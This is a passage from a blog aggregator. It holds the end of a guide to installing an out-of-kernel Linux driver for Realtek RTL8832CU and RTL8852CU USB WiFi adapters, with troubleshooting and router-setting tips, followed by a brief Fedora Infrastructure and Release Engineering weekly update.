    bash sudo apt update && sudo apt upgrade
  • For Arch-based distributions (e.g., Manjaro):
    bash sudo pacman -Syu
  • For Fedora:
    bash sudo dnf upgrade
  1. Install Required Packages:
  • Mandatory packages: gcc, make, bc, kernel-headers, build-essential, git
  • Highly recommended: dkms, rfkill, iw, ip
  • For Secure Boot: openssl, sign-file, mokutil Example for Ubuntu:
   sudo apt install -y build-essential dkms git iw
  1. Download and Install the Driver:
   git clone https://github.com/morrownr/rtl8852cu-20240510.git
   cd rtl8852cu-20240510
   sudo ./install-driver.sh
  1. Reboot Your System:
    After installation, reboot to ensure the driver loads correctly:
   sudo reboot

Troubleshooting Tips

  • Conflicting Drivers: Installing multiple out-of-kernel drivers for the same hardware can cause issues. Use sudo dkms status to check for conflicts.
  • Secure Boot: If Secure Boot is enabled, follow the instructions in the FAQ to enroll the signing key.
  • Manual Installation: If DKMS is unavailable, you can manually compile and install the driver using:
  make clean
  make -j$(nproc)
  sudo make install
  sudo reboot

Recommended Router/AP Settings

To optimize your WiFi performance:

  1. Security: Use WPA2-AES or WPA3. Avoid mixed modes like WPA/WPA2.
  2. Channel Width:
  • 2.4 GHz: Set to 20 MHz fixed width.
  • 5 GHz: Use channels 36–48 or 149–165 for compatibility.
  1. Network Names: Avoid naming all bands (2.4 GHz, 5 GHz, 6 GHz) the same.
  2. Router Placement: Position the router centrally, elevated, and away from walls.

Final Notes

While this driver provides robust support for RTL8832CU and RTL8852CU adapters, it is not without limitations. Users should weigh the trade-offs between stability, compatibility, and advanced features when choosing a WiFi adapter. For most desktop and server users, in-kernel drivers remain the best choice.

If you encounter issues or have questions, consult the FAQ or open an issue on the GitHub repository.

Happy networking! 🚀

The post Linux Driver for RTL8832CU and RTL8852CU USB WiFi Adapters appeared first on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Infra and RelEng Update – Week 6

Posted by Fedora Community Blog on 2025-02-07 10:00:00 UTC

This is a weekly report from the I&R (Infrastructure & Release Engineering) Team. We provide you both infographic and text version of the weekly report. If you just want to quickly look at what we did, just look at the infographic. If you are interested in more in depth details look below the infographic.

Week: 03 – 07 February 2025

Infrastructure & Release Engineering

The purpose of this team is to take care of day to day business regarding CentOS and Fedora Infrastructure and Fedora release engineering work.
It’s responsible for services running in Fedora and CentOS infrastructure and preparing things for the new Fedora release (mirrors, mass branching, new namespaces etc.).
List of planned/in-progress issues

Fedora Infra

CentOS Infra including CentOS CI

Release Engineering

If you have any questions or feedback, please respond to this report or contact us on #redhat-cpe channel on matrix.

The post Infra and RelEng Update – Week 6 appeared first on Fedora Community Blog.